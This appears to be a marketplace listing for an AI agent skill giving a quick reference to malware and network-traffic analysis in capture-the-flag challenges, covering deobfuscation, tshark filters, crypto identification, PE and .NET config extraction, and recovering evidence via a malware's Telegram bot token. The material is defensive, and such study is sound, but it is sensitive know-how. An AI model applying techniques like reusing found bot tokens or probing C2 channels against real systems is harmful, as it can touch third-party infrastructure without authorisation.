What is this skill best used for?

Rapid malware analysis and network traffic investigation in CTF challenges, with a focus on obfuscated code, custom crypto protocols, C2 traffic, and config extraction.

What tools are required?

A filesystem-based agent with Bash and Python 3, internet access, and tools such as tshark, peframe, pe-sieve, pestudio, dnSpy, AsmResolver, LimeRAT extraction utilities, and PyInstaller/PyArmor unpackers.

How do I start extracting malware configurations?

Inspect the .data section, PE/.NET resources, registry keys, and encrypted config files; refer to the pe-and-dotnet.md guidance for systematic extraction of configurations and IOCs.

ctf-malware

Scanned

npx machina-cli add skill ljagiello/ctf-skills/ctf-malware --openclaw

Files (1)

SKILL.md

4.5 KB

CTF Malware & Network Analysis

Quick reference for malware analysis CTF challenges. Each technique has a one-liner here; see supporting files for full details with code.

Additional Resources

scripts-and-obfuscation.md - JavaScript deobfuscation, PowerShell analysis, eval/base64 decoding, junk code detection, hex payloads, Debian package analysis
c2-and-protocols.md - C2 traffic patterns, custom crypto protocols, RC4 WebSocket, DNS-based C2, network indicators, PCAP analysis, AES-CBC, encryption ID, Telegram bot recovery
pe-and-dotnet.md - PE analysis (peframe, pe-sieve, pestudio), .NET analysis (dnSpy, AsmResolver), LimeRAT extraction, sandbox evasion, malware config extraction, PyInstaller+PyArmor

Obfuscated Scripts

Replace eval/bash with echo to print underlying code; extract base64/hex blobs and analyze with file. See scripts-and-obfuscation.md.

JavaScript & PowerShell Deobfuscation

JS: Replace eval with console.log, decode unescape(), atob(), String.fromCharCode().
PowerShell: Decode -enc base64, replace IEX with output. See scripts-and-obfuscation.md.

Junk Code Detection

NOP sleds, push/pop pairs, dead writes, unconditional jumps to next instruction. Filter to extract real call targets. See scripts-and-obfuscation.md.

PCAP & Network Analysis

tshark -r file.pcap -Y "tcp.stream eq X" -T fields -e tcp.payload

Look for C2 on unusual ports. Extract IPs/domains with strings | grep. See c2-and-protocols.md.

Custom Crypto Protocols

Stream ciphers share keystream state for both directions; concatenate ALL payloads chronologically.
ChaCha20 keystream extraction: send nullbytes (0 XOR anything = anything). See c2-and-protocols.md.

C2 Traffic Patterns

Beaconing, DGA, DNS tunneling, HTTP(S) with custom headers, encoded payloads. See c2-and-protocols.md.

RC4-Encrypted WebSocket C2

Remap port with tcprewrite, add RSA key for TLS decryption, find RC4 key in binary. See c2-and-protocols.md.

Identifying Encryption Algorithms

AES: 0x637c777b S-box; ChaCha20: expand 32-byte k; TEA/XTEA: 0x9E3779B9; RC4: sequential S-box init. See c2-and-protocols.md.

AES-CBC in Malware

Key = MD5/SHA256 of hardcoded string; IV = first 16 bytes of ciphertext. See c2-and-protocols.md.

PE Analysis

peframe malware.exe      # Quick triage
pe-sieve                 # Runtime analysis
pestudio                 # Static analysis (Windows)

See pe-and-dotnet.md.

.NET Malware Analysis

Use dnSpy/ILSpy for decompilation; AsmResolver for programmatic analysis. LimeRAT C2: AES-256-ECB with MD5-derived key. See pe-and-dotnet.md.

Malware Configuration Extraction

Check .data section, PE/.NET resources, registry keys, encrypted config files. See pe-and-dotnet.md.

Sandbox Evasion Checks

VM detection, debugger detection, timing checks, environment checks, analysis tool detection. See pe-and-dotnet.md.

PyInstaller + PyArmor Unpacking

pyinstxtractor.py to extract, PyArmor-Unpacker for protected code. See pe-and-dotnet.md.

Telegram Bot Evidence Recovery

Use bot token from malware source to call getUpdates and getFile APIs. See c2-and-protocols.md.

Debian Package Analysis

ar -x package.deb && tar -xf control.tar.xz  # Check postinst scripts

See scripts-and-obfuscation.md.

Network Indicators Quick Reference

strings malware | grep -E '[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}'
tshark -r capture.pcap -Y "dns.qry.name" -T fields -e dns.qry.name | sort -u

Source

git clone https://github.com/ljagiello/ctf-skills/blob/main/ctf-malware/SKILL.mdView on GitHub

Overview

This skill provides rapid techniques for malware analysis and network traffic investigation in CTF challenges. It covers obfuscated scripts, malicious packages, custom crypto protocols, C2 traffic, and PE/.NET binaries, with a focus on extracting malware configurations and indicators of compromise.

How This Skill Works

It organizes practical workflows across key categories (obfuscated scripts, network traffic, crypto protocols, and PE/.NET analysis) and maps them to concrete tools and commands. You’ll perform deobfuscation, PCAP/C2 pattern analysis, crypto payload extraction, and static/dynamic analysis using tools like tshark, peframe, pe-sieve, pestudio, dnSpy, AsmResolver, LimeRAT extraction utilities, and PyInstaller/PyArmor unpackers to recover configurations and IOCs.

When to Use It

When you encounter obfuscated JavaScript or PowerShell payloads in a CTF
When analyzing a malicious package or installer for hidden payloads and C2 behavior
When you need to reverse or reconstruct a custom crypto protocol or RC4/AES C2 channel
When tracing C2 traffic in PCAPs to identify beaconing patterns and IOCs
When triaging PE/.NET malware and extracting embedded configurations or indicators

Quick Start

Step 1: Identify artifact type (JS/PowerShell, PE/.NET, PCAP, or package) and run quick triage with the recommended tools (peframe/pe-sieve/pestudio for PE, tshark for PCAP, and basic strings).
Step 2: Perform deobfuscation and payload extraction following guidance in scripts-and-obfuscation.md (replace eval with echo, decode base64, extract base64/hex blobs).
Step 3: Analyze C2 patterns and crypto usage; extract configurations and IOCs, then document findings for reporting.

Best Practices

Deobfuscate first: replace eval/base64-like tricks and decode payloads to reveal the underlying code
Use category-specific tools (ts/pcap analysis with tshark, PE/.NET tooling for binaries, deobfuscation pipelines)
Focus on C2 patterns and encryption: beacon behavior, custom headers, and key recovery
Extract malware configurations from data sections, resources, registries, and encrypted files
Document IOCs clearly and validate findings with repeatable, safe sandbox checks

Example Use Cases

Obfuscated JavaScript in a CTF payload decoded by replacing eval and decoding base64 to reveal a hidden beacon
Malicious installer analyzed; C2 traffic observed on a non-standard port with RC4-encrypted payloads
PCAP analysis uncovers RC4 WebSocket C2; recovered RC4 key from binary and reconstructed traffic
PE sample triaged with peframe/pe-sieve/pestudio reveals embedded configuration and sandbox evasion checks
.NET malware sample decompiled with dnSpy/AsmResolver; LimeRAT-like AES-256-ECB config recovered

Frequently Asked Questions

Add this skill to your agents